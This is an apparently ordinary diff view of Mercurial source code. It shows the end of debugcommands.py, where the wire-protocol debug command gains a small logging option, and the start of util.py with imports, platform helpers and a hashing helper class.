2419 2419 [('r', 'rev', [], _('apply template on changesets'), _('REV')),
2420 2420 ('D', 'define', [], _('define template keyword'), _('KEY=VALUE'))],
2421 2421 _('[-r REV]... [-D KEY=VALUE]... TEMPLATE'),
2422 2422 optionalrepo=True)
2423 2423 def debugtemplate(ui, repo, tmpl, **opts):
2424 2424 """parse and apply a template
2425 2425
2426 2426 If -r/--rev is given, the template is processed as a log template and
2427 2427 applied to the given changesets. Otherwise, it is processed as a generic
2428 2428 template.
2429 2429
2430 2430 Use --verbose to print the parsed tree.
2431 2431 """
2432 2432 revs = None
2433 2433 if opts[r'rev']:
2434 2434 if repo is None:
2435 2435 raise error.RepoError(_('there is no Mercurial repository here '
2436 2436 '(.hg not found)'))
2437 2437 revs = scmutil.revrange(repo, opts[r'rev'])
2438 2438
2439 2439 props = {}
2440 2440 for d in opts[r'define']:
2441 2441 try:
2442 2442 k, v = (e.strip() for e in d.split('=', 1))
2443 2443 if not k or k == 'ui':
2444 2444 raise ValueError
2445 2445 props[k] = v
2446 2446 except ValueError:
2447 2447 raise error.Abort(_('malformed keyword definition: %s') % d)
2448 2448
2449 2449 if ui.verbose:
2450 2450 aliases = ui.configitems('templatealias')
2451 2451 tree = templater.parse(tmpl)
2452 2452 ui.note(templater.prettyformat(tree), '\n')
2453 2453 newtree = templater.expandaliases(tree, aliases)
2454 2454 if newtree != tree:
2455 2455 ui.note(("* expanded:\n"), templater.prettyformat(newtree), '\n')
2456 2456
2457 2457 if revs is None:
2458 2458 tres = formatter.templateresources(ui, repo)
2459 2459 t = formatter.maketemplater(ui, tmpl, resources=tres)
2460 2460 ui.write(t.renderdefault(props))
2461 2461 else:
2462 2462 displayer = logcmdutil.maketemplater(ui, repo, tmpl)
2463 2463 for r in revs:
2464 2464 displayer.show(repo[r], **pycompat.strkwargs(props))
2465 2465 displayer.close()
2466 2466
2467 2467 @command('debuguigetpass', [
2468 2468 ('p', 'prompt', '', _('prompt text'), _('TEXT')),
2469 2469 ], _('[-p TEXT]'), norepo=True)
2470 2470 def debuguigetpass(ui, prompt=''):
2471 2471 """show prompt to type password"""
2472 2472 r = ui.getpass(prompt)
2473 2473 ui.write(('respose: %s\n') % r)
2474 2474
2475 2475 @command('debuguiprompt', [
2476 2476 ('p', 'prompt', '', _('prompt text'), _('TEXT')),
2477 2477 ], _('[-p TEXT]'), norepo=True)
2478 2478 def debuguiprompt(ui, prompt=''):
2479 2479 """show plain prompt"""
2480 2480 r = ui.prompt(prompt)
2481 2481 ui.write(('response: %s\n') % r)
2482 2482
2483 2483 @command('debugupdatecaches', [])
2484 2484 def debugupdatecaches(ui, repo, *pats, **opts):
2485 2485 """warm all known caches in the repository"""
2486 2486 with repo.wlock(), repo.lock():
2487 2487 repo.updatecaches(full=True)
2488 2488
2489 2489 @command('debugupgraderepo', [
2490 2490 ('o', 'optimize', [], _('extra optimization to perform'), _('NAME')),
2491 2491 ('', 'run', False, _('performs an upgrade')),
2492 2492 ])
2493 2493 def debugupgraderepo(ui, repo, run=False, optimize=None):
2494 2494 """upgrade a repository to use different features
2495 2495
2496 2496 If no arguments are specified, the repository is evaluated for upgrade
2497 2497 and a list of problems and potential optimizations is printed.
2498 2498
2499 2499 With ``--run``, a repository upgrade is performed. Behavior of the upgrade
2500 2500 can be influenced via additional arguments. More details will be provided
2501 2501 by the command output when run without ``--run``.
2502 2502
2503 2503 During the upgrade, the repository will be locked and no writes will be
2504 2504 allowed.
2505 2505
2506 2506 At the end of the upgrade, the repository may not be readable while new
2507 2507 repository data is swapped in. This window will be as long as it takes to
2508 2508 rename some directories inside the ``.hg`` directory. On most machines, this
2509 2509 should complete almost instantaneously and the chances of a consumer being
2510 2510 unable to access the repository should be low.
2511 2511 """
2512 2512 return upgrade.upgraderepo(ui, repo, run=run, optimize=optimize)
2513 2513
2514 2514 @command('debugwalk', cmdutil.walkopts, _('[OPTION]... [FILE]...'),
2515 2515 inferrepo=True)
2516 2516 def debugwalk(ui, repo, *pats, **opts):
2517 2517 """show how files match on given patterns"""
2518 2518 opts = pycompat.byteskwargs(opts)
2519 2519 m = scmutil.match(repo[None], pats, opts)
2520 2520 ui.write(('matcher: %r\n' % m))
2521 2521 items = list(repo[None].walk(m))
2522 2522 if not items:
2523 2523 return
2524 2524 f = lambda fn: fn
2525 2525 if ui.configbool('ui', 'slash') and pycompat.ossep != '/':
2526 2526 f = lambda fn: util.normpath(fn)
2527 2527 fmt = 'f %%-%ds %%-%ds %%s' % (
2528 2528 max([len(abs) for abs in items]),
2529 2529 max([len(m.rel(abs)) for abs in items]))
2530 2530 for abs in items:
2531 2531 line = fmt % (abs, f(m.rel(abs)), m.exact(abs) and 'exact' or '')
2532 2532 ui.write("%s\n" % line.rstrip())
2533 2533
2534 2534 @command('debugwhyunstable', [], _('REV'))
2535 2535 def debugwhyunstable(ui, repo, rev):
2536 2536 """explain instabilities of a changeset"""
2537 2537 for entry in obsutil.whyunstable(repo, repo[rev]):
2538 2538 dnodes = ''
2539 2539 if entry.get('divergentnodes'):
2540 2540 dnodes = ' '.join('%s (%s)' % (ctx.hex(), ctx.phasestr())
2541 2541 for ctx in entry['divergentnodes']) + ' '
2542 2542 ui.write('%s: %s%s %s\n' % (entry['instability'], dnodes,
2543 2543 entry['reason'], entry['node']))
2544 2544
2545 2545 @command('debugwireargs',
2546 2546 [('', 'three', '', 'three'),
2547 2547 ('', 'four', '', 'four'),
2548 2548 ('', 'five', '', 'five'),
2549 2549 ] + cmdutil.remoteopts,
2550 2550 _('REPO [OPTIONS]... [ONE [TWO]]'),
2551 2551 norepo=True)
2552 2552 def debugwireargs(ui, repopath, *vals, **opts):
2553 2553 opts = pycompat.byteskwargs(opts)
2554 2554 repo = hg.peer(ui, opts, repopath)
2555 2555 for opt in cmdutil.remoteopts:
2556 2556 del opts[opt[1]]
2557 2557 args = {}
2558 2558 for k, v in opts.iteritems():
2559 2559 if v:
2560 2560 args[k] = v
2561 2561 args = pycompat.strkwargs(args)
2562 2562 # run twice to check that we don't mess up the stream for the next command
2563 2563 res1 = repo.debugwireargs(*vals, **args)
2564 2564 res2 = repo.debugwireargs(*vals, **args)
2565 2565 ui.write("%s\n" % res1)
2566 2566 if res1 != res2:
2567 2567 ui.warn("%s\n" % res2)
2568 2568
2569 2569 def _parsewirelangblocks(fh):
2570 2570 activeaction = None
2571 2571 blocklines = []
2572 2572
2573 2573 for line in fh:
2574 2574 line = line.rstrip()
2575 2575 if not line:
2576 2576 continue
2577 2577
2578 2578 if line.startswith(b'#'):
2579 2579 continue
2580 2580
2581 2581 if not line.startswith(' '):
2582 2582 # New block. Flush previous one.
2583 2583 if activeaction:
2584 2584 yield activeaction, blocklines
2585 2585
2586 2586 activeaction = line
2587 2587 blocklines = []
2588 2588 continue
2589 2589
2590 2590 # Else we start with an indent.
2591 2591
2592 2592 if not activeaction:
2593 2593 raise error.Abort(_('indented line outside of block'))
2594 2594
2595 2595 blocklines.append(line)
2596 2596
2597 2597 # Flush last block.
2598 2598 if activeaction:
2599 2599 yield activeaction, blocklines
2600 2600
2601 2601 @command('debugwireproto',
2602 2602 [
2603 2603 ('', 'localssh', False, _('start an SSH server for this repo')),
2604 2604 ('', 'peer', '', _('construct a specific version of the peer')),
2605 2605 ('', 'noreadstderr', False, _('do not read from stderr of the remote')),
2606 2606 ] + cmdutil.remoteopts,
2607 2607 _('[PATH]'),
2608 2608 optionalrepo=True)
2609 2609 def debugwireproto(ui, repo, path=None, **opts):
2610 2610 """send wire protocol commands to a server
2611 2611
2612 2612 This command can be used to issue wire protocol commands to remote
2613 2613 peers and to debug the raw data being exchanged.
2614 2614
2615 2615 ``--localssh`` will start an SSH server against the current repository
2616 2616 and connect to that. By default, the connection will perform a handshake
2617 2617 and establish an appropriate peer instance.
2618 2618
2619 2619 ``--peer`` can be used to bypass the handshake protocol and construct a
2620 2620 peer instance using the specified class type. Valid values are ``raw``,
2621 2621 ``ssh1``, and ``ssh2``. ``raw`` instances only allow sending raw data
2622 2622 payloads and don't support higher-level command actions.
2623 2623
2624 2624 ``--noreadstderr`` can be used to disable automatic reading from stderr
2625 2625 of the peer (for SSH connections only). Disabling automatic reading of
2626 2626 stderr is useful for making output more deterministic.
2627 2627
2628 2628 Commands are issued via a mini language which is specified via stdin.
2629 2629 The language consists of individual actions to perform. An action is
2630 2630 defined by a block. A block is defined as a line with no leading
2631 2631 space followed by 0 or more lines with leading space. Blocks are
2632 2632 effectively a high-level command with additional metadata.
2633 2633
2634 2634 Lines beginning with ``#`` are ignored.
2635 2635
2636 2636 The following sections denote available actions.
2637 2637
2638 2638 raw
2639 2639 ---
2640 2640
2641 2641 Send raw data to the server.
2642 2642
2643 2643 The block payload contains the raw data to send as one atomic send
2644 2644 operation. The data may not actually be delivered in a single system
2645 2645 call: it depends on the abilities of the transport being used.
2646 2646
2647 2647 Each line in the block is de-indented and concatenated. Then, that
2648 2648 value is evaluated as a Python b'' literal. This allows the use of
2649 2649 backslash escaping, etc.
2650 2650
2651 2651 raw+
2652 2652 ----
2653 2653
2654 2654 Behaves like ``raw`` except flushes output afterwards.
2655 2655
2656 2656 command <X>
2657 2657 -----------
2658 2658
2659 2659 Send a request to run a named command, whose name follows the ``command``
2660 2660 string.
2661 2661
2662 2662 Arguments to the command are defined as lines in this block. The format of
2663 2663 each line is ``<key> <value>``. e.g.::
2664 2664
2665 2665 command listkeys
2666 2666 namespace bookmarks
2667 2667
2668 2668 Values are interpreted as Python b'' literals. This allows encoding
2669 2669 special byte sequences via backslash escaping.
2670 2670
2671 2671 The following arguments have special meaning:
2672 2672
2673 2673 ``PUSHFILE``
2674 2674 When defined, the *push* mechanism of the peer will be used instead
2675 2675 of the static request-response mechanism and the content of the
2676 2676 file specified in the value of this argument will be sent as the
2677 2677 command payload.
2678 2678
2679 2679 This can be used to submit a local bundle file to the remote.
2680 2680
2681 2681 batchbegin
2682 2682 ----------
2683 2683
2684 2684 Instruct the peer to begin a batched send.
2685 2685
2686 2686 All ``command`` blocks are queued for execution until the next
2687 2687 ``batchsubmit`` block.
2688 2688
2689 2689 batchsubmit
2690 2690 -----------
2691 2691
2692 2692 Submit previously queued ``command`` blocks as a batch request.
2693 2693
2694 2694 This action MUST be paired with a ``batchbegin`` action.
2695 2695
2696 2696 httprequest <method> <path>
2697 2697 ---------------------------
2698 2698
2699 2699 (HTTP peer only)
2700 2700
2701 2701 Send an HTTP request to the peer.
2702 2702
2703 2703 The HTTP request line follows the ``httprequest`` action. e.g. ``GET /foo``.
2704 2704
2705 2705 Arguments of the form ``<key>: <value>`` are interpreted as HTTP request
2706 2706 headers to add to the request. e.g. ``Accept: foo``.
2707 2707
2708 2708 The following arguments are special:
2709 2709
2710 2710 ``BODYFILE``
2711 2711 The content of the file defined as the value to this argument will be
2712 2712 transferred verbatim as the HTTP request body.
2713 2713
2714 2714 close
2715 2715 -----
2716 2716
2717 2717 Close the connection to the server.
2718 2718
2719 2719 flush
2720 2720 -----
2721 2721
2722 2722 Flush data written to the server.
2723 2723
2724 2724 readavailable
2725 2725 -------------
2726 2726
2727 2727 Close the write end of the connection and read all available data from
2728 2728 the server.
2729 2729
2730 2730 If the connection to the server encompasses multiple pipes, we poll both
2731 2731 pipes and read available data.
2732 2732
2733 2733 readline
2734 2734 --------
2735 2735
2736 2736 Read a line of output from the server. If there are multiple output
2737 2737 pipes, reads only the main pipe.
2738 2738
2739 2739 ereadline
2740 2740 ---------
2741 2741
2742 2742 Like ``readline``, but read from the stderr pipe, if available.
2743 2743
2744 2744 read <X>
2745 2745 --------
2746 2746
2747 2747 ``read()`` N bytes from the server's main output pipe.
2748 2748
2749 2749 eread <X>
2750 2750 ---------
2751 2751
2752 2752 ``read()`` N bytes from the server's stderr pipe, if available.
2753 2753 """
2754 2754 opts = pycompat.byteskwargs(opts)
2755 2755
2756 2756 if opts['localssh'] and not repo:
2757 2757 raise error.Abort(_('--localssh requires a repository'))
2758 2758
2759 2759 if opts['peer'] and opts['peer'] not in ('raw', 'ssh1', 'ssh2'):
2760 2760 raise error.Abort(_('invalid value for --peer'),
2761 2761 hint=_('valid values are "raw", "ssh1", and "ssh2"'))
2762 2762
2763 2763 if path and opts['localssh']:
2764 2764 raise error.Abort(_('cannot specify --localssh with an explicit '
2765 2765 'path'))
2766 2766
2767 2767 if ui.interactive():
2768 2768 ui.write(_('(waiting for commands on stdin)\n'))
2769 2769
2770 2770 blocks = list(_parsewirelangblocks(ui.fin))
2771 2771
2772 2772 proc = None
2773 2773 stdin = None
2774 2774 stdout = None
2775 2775 stderr = None
2776 2776 opener = None
2777 2777
2778 2778 if opts['localssh']:
2779 2779 # We start the SSH server in its own process so there is process
2780 2780 # separation. This prevents a whole class of potential bugs around
2781 2781 # shared state from interfering with server operation.
2782 2782 args = util.hgcmd() + [
2783 2783 '-R', repo.root,
2784 2784 'debugserve', '--sshstdio',
2785 2785 ]
2786 2786 proc = subprocess.Popen(args, stdin=subprocess.PIPE,
2787 2787 stdout=subprocess.PIPE, stderr=subprocess.PIPE,
2788 2788 bufsize=0)
2789 2789
2790 2790 stdin = proc.stdin
2791 2791 stdout = proc.stdout
2792 2792 stderr = proc.stderr
2793 2793
2794 2794 # We turn the pipes into observers so we can log I/O.
2795 2795 if ui.verbose or opts['peer'] == 'raw':
2796 2796 stdin = util.makeloggingfileobject(ui, proc.stdin, b'i',
2797 2797 logdata=True)
2798 2798 stdout = util.makeloggingfileobject(ui, proc.stdout, b'o',
2799 2799 logdata=True)
2800 2800 stderr = util.makeloggingfileobject(ui, proc.stderr, b'e',
2801 2801 logdata=True)
2802 2802
2803 2803 # --localssh also implies the peer connection settings.
2804 2804
2805 2805 url = 'ssh://localserver'
2806 2806 autoreadstderr = not opts['noreadstderr']
2807 2807
2808 2808 if opts['peer'] == 'ssh1':
2809 2809 ui.write(_('creating ssh peer for wire protocol version 1\n'))
2810 2810 peer = sshpeer.sshv1peer(ui, url, proc, stdin, stdout, stderr,
2811 2811 None, autoreadstderr=autoreadstderr)
2812 2812 elif opts['peer'] == 'ssh2':
2813 2813 ui.write(_('creating ssh peer for wire protocol version 2\n'))
2814 2814 peer = sshpeer.sshv2peer(ui, url, proc, stdin, stdout, stderr,
2815 2815 None, autoreadstderr=autoreadstderr)
2816 2816 elif opts['peer'] == 'raw':
2817 2817 ui.write(_('using raw connection to peer\n'))
2818 2818 peer = None
2819 2819 else:
2820 2820 ui.write(_('creating ssh peer from handshake results\n'))
2821 2821 peer = sshpeer.makepeer(ui, url, proc, stdin, stdout, stderr,
2822 2822 autoreadstderr=autoreadstderr)
2823 2823
2824 2824 elif path:
2825 2825 # We bypass hg.peer() so we can proxy the sockets.
2826 2826 # TODO consider not doing this because we skip
2827 2827 # ``hg.wirepeersetupfuncs`` and potentially other useful functionality.
2828 2828 u = util.url(path)
2829 2829 if u.scheme != 'http':
2830 2830 raise error.Abort(_('only http:// paths are currently supported'))
2831 2831
2832 2832 url, authinfo = u.authinfo()
2833 2833 openerargs = {}
2834 2834
2835 2835 # Turn pipes/sockets into observers so we can log I/O.
2836 2836 if ui.verbose:
2837 2837 openerargs = {
2838 2838 r'loggingfh': ui,
2839 2839 r'loggingname': b's',
2840 2840 r'loggingopts': {
2841 2841 r'logdata': True,
2842 r'logdataapis': False,
2842 2843 },
2843 2844 }
2844 2845
2846 if ui.debugflag:
2847 openerargs[r'loggingopts'][r'logdataapis'] = True
2848
2845 2849 opener = urlmod.opener(ui, authinfo, **openerargs)
2846 2850
2847 2851 if opts['peer'] == 'raw':
2848 2852 ui.write(_('using raw connection to peer\n'))
2849 2853 peer = None
2850 2854 elif opts['peer']:
2851 2855 raise error.Abort(_('--peer %s not supported with HTTP peers') %
2852 2856 opts['peer'])
2853 2857 else:
2854 2858 peer = httppeer.httppeer(ui, path, url, opener)
2855 2859 peer._fetchcaps()
2856 2860
2857 2861 # We /could/ populate stdin/stdout with sock.makefile()...
2858 2862 else:
2859 2863 raise error.Abort(_('unsupported connection configuration'))
2860 2864
2861 2865 batchedcommands = None
2862 2866
2863 2867 # Now perform actions based on the parsed wire language instructions.
2864 2868 for action, lines in blocks:
2865 2869 if action in ('raw', 'raw+'):
2866 2870 if not stdin:
2867 2871 raise error.Abort(_('cannot call raw/raw+ on this peer'))
2868 2872
2869 2873 # Concatenate the data together.
2870 2874 data = ''.join(l.lstrip() for l in lines)
2871 2875 data = util.unescapestr(data)
2872 2876 stdin.write(data)
2873 2877
2874 2878 if action == 'raw+':
2875 2879 stdin.flush()
2876 2880 elif action == 'flush':
2877 2881 if not stdin:
2878 2882 raise error.Abort(_('cannot call flush on this peer'))
2879 2883 stdin.flush()
2880 2884 elif action.startswith('command'):
2881 2885 if not peer:
2882 2886 raise error.Abort(_('cannot send commands unless peer instance '
2883 2887 'is available'))
2884 2888
2885 2889 command = action.split(' ', 1)[1]
2886 2890
2887 2891 args = {}
2888 2892 for line in lines:
2889 2893 # We need to allow empty values.
2890 2894 fields = line.lstrip().split(' ', 1)
2891 2895 if len(fields) == 1:
2892 2896 key = fields[0]
2893 2897 value = ''
2894 2898 else:
2895 2899 key, value = fields
2896 2900
2897 2901 args[key] = util.unescapestr(value)
2898 2902
2899 2903 if batchedcommands is not None:
2900 2904 batchedcommands.append((command, args))
2901 2905 continue
2902 2906
2903 2907 ui.status(_('sending %s command\n') % command)
2904 2908
2905 2909 if 'PUSHFILE' in args:
2906 2910 with open(args['PUSHFILE'], r'rb') as fh:
2907 2911 del args['PUSHFILE']
2908 2912 res, output = peer._callpush(command, fh,
2909 2913 **pycompat.strkwargs(args))
2910 2914 ui.status(_('result: %s\n') % util.escapedata(res))
2911 2915 ui.status(_('remote output: %s\n') %
2912 2916 util.escapedata(output))
2913 2917 else:
2914 2918 res = peer._call(command, **pycompat.strkwargs(args))
2915 2919 ui.status(_('response: %s\n') % util.escapedata(res))
2916 2920
2917 2921 elif action == 'batchbegin':
2918 2922 if batchedcommands is not None:
2919 2923 raise error.Abort(_('nested batchbegin not allowed'))
2920 2924
2921 2925 batchedcommands = []
2922 2926 elif action == 'batchsubmit':
2923 2927 # There is a batching API we could go through. But it would be
2924 2928 # difficult to normalize requests into function calls. It is easier
2925 2929 # to bypass this layer and normalize to commands + args.
2926 2930 ui.status(_('sending batch with %d sub-commands\n') %
2927 2931 len(batchedcommands))
2928 2932 for i, chunk in enumerate(peer._submitbatch(batchedcommands)):
2929 2933 ui.status(_('response #%d: %s\n') % (i, util.escapedata(chunk)))
2930 2934
2931 2935 batchedcommands = None
2932 2936
2933 2937 elif action.startswith('httprequest '):
2934 2938 if not opener:
2935 2939 raise error.Abort(_('cannot use httprequest without an HTTP '
2936 2940 'peer'))
2937 2941
2938 2942 request = action.split(' ', 2)
2939 2943 if len(request) != 3:
2940 2944 raise error.Abort(_('invalid httprequest: expected format is '
2941 2945 '"httprequest <method> <path>'))
2942 2946
2943 2947 method, httppath = request[1:]
2944 2948 headers = {}
2945 2949 body = None
2946 2950 for line in lines:
2947 2951 line = line.lstrip()
2948 2952 m = re.match(b'^([a-zA-Z0-9_-]+): (.*)$', line)
2949 2953 if m:
2950 2954 headers[m.group(1)] = m.group(2)
2951 2955 continue
2952 2956
2953 2957 if line.startswith(b'BODYFILE '):
2954 2958 with open(line.split(b' ', 1), 'rb') as fh:
2955 2959 body = fh.read()
2956 2960 else:
2957 2961 raise error.Abort(_('unknown argument to httprequest: %s') %
2958 2962 line)
2959 2963
2960 2964 url = path + httppath
2961 2965 req = urlmod.urlreq.request(pycompat.strurl(url), body, headers)
2962 2966
2963 2967 try:
2964 2968 opener.open(req).read()
2965 2969 except util.urlerr.urlerror as e:
2966 2970 e.read()
2967 2971
2968 2972 elif action == 'close':
2969 2973 peer.close()
2970 2974 elif action == 'readavailable':
2971 2975 if not stdout or not stderr:
2972 2976 raise error.Abort(_('readavailable not available on this peer'))
2973 2977
2974 2978 stdin.close()
2975 2979 stdout.read()
2976 2980 stderr.read()
2977 2981
2978 2982 elif action == 'readline':
2979 2983 if not stdout:
2980 2984 raise error.Abort(_('readline not available on this peer'))
2981 2985 stdout.readline()
2982 2986 elif action == 'ereadline':
2983 2987 if not stderr:
2984 2988 raise error.Abort(_('ereadline not available on this peer'))
2985 2989 stderr.readline()
2986 2990 elif action.startswith('read '):
2987 2991 count = int(action.split(' ', 1)[1])
2988 2992 if not stdout:
2989 2993 raise error.Abort(_('read not available on this peer'))
2990 2994 stdout.read(count)
2991 2995 elif action.startswith('eread '):
2992 2996 count = int(action.split(' ', 1)[1])
2993 2997 if not stderr:
2994 2998 raise error.Abort(_('eread not available on this peer'))
2995 2999 stderr.read(count)
2996 3000 else:
2997 3001 raise error.Abort(_('unknown action: %s') % action)
2998 3002
2999 3003 if batchedcommands is not None:
3000 3004 raise error.Abort(_('unclosed "batchbegin" request'))
3001 3005
3002 3006 if peer:
3003 3007 peer.close()
3004 3008
3005 3009 if proc:
3006 3010 proc.kill()
@@ -1,4324 +1,4365 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import codecs
21 21 import collections
22 22 import contextlib
23 23 import errno
24 24 import gc
25 25 import hashlib
26 26 import imp
27 27 import io
28 28 import itertools
29 29 import mmap
30 30 import os
31 31 import platform as pyplatform
32 32 import re as remod
33 33 import shutil
34 34 import signal
35 35 import socket
36 36 import stat
37 37 import string
38 38 import subprocess
39 39 import sys
40 40 import tempfile
41 41 import textwrap
42 42 import time
43 43 import traceback
44 44 import warnings
45 45 import zlib
46 46
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 node as nodemod,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56 from .utils import dateutil
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 empty = pycompat.empty
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 queue = pycompat.queue
70 70 socketserver = pycompat.socketserver
71 71 stderr = pycompat.stderr
72 72 stdin = pycompat.stdin
73 73 stdout = pycompat.stdout
74 74 bytesio = pycompat.bytesio
75 75 # TODO deprecate stringio name, as it is a lie on Python 3.
76 76 stringio = bytesio
77 77 xmlrpclib = pycompat.xmlrpclib
78 78
79 79 httpserver = urllibcompat.httpserver
80 80 urlerr = urllibcompat.urlerr
81 81 urlreq = urllibcompat.urlreq
82 82
83 83 # workaround for win32mbcs
84 84 _filenamebytestr = pycompat.bytestr
85 85
86 86 def isatty(fp):
87 87 try:
88 88 return fp.isatty()
89 89 except AttributeError:
90 90 return False
91 91
92 92 # glibc determines buffering on first write to stdout - if we replace a TTY
93 93 # destined stdout with a pipe destined stdout (e.g. pager), we want line
94 94 # buffering
95 95 if isatty(stdout):
96 96 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
97 97
98 98 if pycompat.iswindows:
99 99 from . import windows as platform
100 100 stdout = platform.winstdout(stdout)
101 101 else:
102 102 from . import posix as platform
103 103
104 104 _ = i18n._
105 105
106 106 bindunixsocket = platform.bindunixsocket
107 107 cachestat = platform.cachestat
108 108 checkexec = platform.checkexec
109 109 checklink = platform.checklink
110 110 copymode = platform.copymode
111 111 executablepath = platform.executablepath
112 112 expandglobs = platform.expandglobs
113 113 explainexit = platform.explainexit
114 114 findexe = platform.findexe
115 115 getfsmountpoint = platform.getfsmountpoint
116 116 getfstype = platform.getfstype
117 117 gethgcmd = platform.gethgcmd
118 118 getuser = platform.getuser
119 119 getpid = os.getpid
120 120 groupmembers = platform.groupmembers
121 121 groupname = platform.groupname
122 122 hidewindow = platform.hidewindow
123 123 isexec = platform.isexec
124 124 isowner = platform.isowner
125 125 listdir = osutil.listdir
126 126 localpath = platform.localpath
127 127 lookupreg = platform.lookupreg
128 128 makedir = platform.makedir
129 129 nlinks = platform.nlinks
130 130 normpath = platform.normpath
131 131 normcase = platform.normcase
132 132 normcasespec = platform.normcasespec
133 133 normcasefallback = platform.normcasefallback
134 134 openhardlinks = platform.openhardlinks
135 135 oslink = platform.oslink
136 136 parsepatchoutput = platform.parsepatchoutput
137 137 pconvert = platform.pconvert
138 138 poll = platform.poll
139 139 popen = platform.popen
140 140 posixfile = platform.posixfile
141 141 quotecommand = platform.quotecommand
142 142 readpipe = platform.readpipe
143 143 rename = platform.rename
144 144 removedirs = platform.removedirs
145 145 samedevice = platform.samedevice
146 146 samefile = platform.samefile
147 147 samestat = platform.samestat
148 148 setbinary = platform.setbinary
149 149 setflags = platform.setflags
150 150 setsignalhandler = platform.setsignalhandler
151 151 shellquote = platform.shellquote
152 152 shellsplit = platform.shellsplit
153 153 spawndetached = platform.spawndetached
154 154 split = platform.split
155 155 sshargs = platform.sshargs
156 156 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
157 157 statisexec = platform.statisexec
158 158 statislink = platform.statislink
159 159 testpid = platform.testpid
160 160 umask = platform.umask
161 161 unlink = platform.unlink
162 162 username = platform.username
163 163
164 164 try:
165 165 recvfds = osutil.recvfds
166 166 except AttributeError:
167 167 pass
168 168 try:
169 169 setprocname = osutil.setprocname
170 170 except AttributeError:
171 171 pass
172 172 try:
173 173 unblocksignal = osutil.unblocksignal
174 174 except AttributeError:
175 175 pass
176 176
177 177 # Python compatibility
178 178
179 179 _notset = object()
180 180
181 181 def safehasattr(thing, attr):
182 182 return getattr(thing, attr, _notset) is not _notset
183 183
184 184 def _rapply(f, xs):
185 185 if xs is None:
186 186 # assume None means non-value of optional data
187 187 return xs
188 188 if isinstance(xs, (list, set, tuple)):
189 189 return type(xs)(_rapply(f, x) for x in xs)
190 190 if isinstance(xs, dict):
191 191 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
192 192 return f(xs)
193 193
194 194 def rapply(f, xs):
195 195 """Apply function recursively to every item preserving the data structure
196 196
197 197 >>> def f(x):
198 198 ... return 'f(%s)' % x
199 199 >>> rapply(f, None) is None
200 200 True
201 201 >>> rapply(f, 'a')
202 202 'f(a)'
203 203 >>> rapply(f, {'a'}) == {'f(a)'}
204 204 True
205 205 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
206 206 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
207 207
208 208 >>> xs = [object()]
209 209 >>> rapply(pycompat.identity, xs) is xs
210 210 True
211 211 """
212 212 if f is pycompat.identity:
213 213 # fast path mainly for py2
214 214 return xs
215 215 return _rapply(f, xs)
216 216
217 217 def bitsfrom(container):
218 218 bits = 0
219 219 for bit in container:
220 220 bits |= bit
221 221 return bits
222 222
223 223 # python 2.6 still have deprecation warning enabled by default. We do not want
224 224 # to display anything to standard user so detect if we are running test and
225 225 # only use python deprecation warning in this case.
226 226 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
227 227 if _dowarn:
228 228 # explicitly unfilter our warning for python 2.7
229 229 #
230 230 # The option of setting PYTHONWARNINGS in the test runner was investigated.
231 231 # However, module name set through PYTHONWARNINGS was exactly matched, so
232 232 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
233 233 # makes the whole PYTHONWARNINGS thing useless for our usecase.
234 234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
235 235 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
236 236 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
237 237 if _dowarn and pycompat.ispy3:
238 238 # silence warning emitted by passing user string to re.sub()
239 239 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
240 240 r'mercurial')
241 241 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
242 242 DeprecationWarning, r'mercurial')
243 243
244 244 def nouideprecwarn(msg, version, stacklevel=1):
245 245 """Issue an python native deprecation warning
246 246
247 247 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
248 248 """
249 249 if _dowarn:
250 250 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
251 251 " update your code.)") % version
252 252 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
253 253
254 254 DIGESTS = {
255 255 'md5': hashlib.md5,
256 256 'sha1': hashlib.sha1,
257 257 'sha512': hashlib.sha512,
258 258 }
259 259 # List of digest types from strongest to weakest
260 260 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
261 261
262 262 for k in DIGESTS_BY_STRENGTH:
263 263 assert k in DIGESTS
264 264
265 265 class digester(object):
266 266 """helper to compute digests.
267 267
268 268 This helper can be used to compute one or more digests given their name.
269 269
270 270 >>> d = digester([b'md5', b'sha1'])
271 271 >>> d.update(b'foo')
272 272 >>> [k for k in sorted(d)]
273 273 ['md5', 'sha1']
274 274 >>> d[b'md5']
275 275 'acbd18db4cc2f85cedef654fccc4a4d8'
276 276 >>> d[b'sha1']
277 277 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
278 278 >>> digester.preferred([b'md5', b'sha1'])
279 279 'sha1'
280 280 """
281 281
282 282 def __init__(self, digests, s=''):
283 283 self._hashes = {}
284 284 for k in digests:
285 285 if k not in DIGESTS:
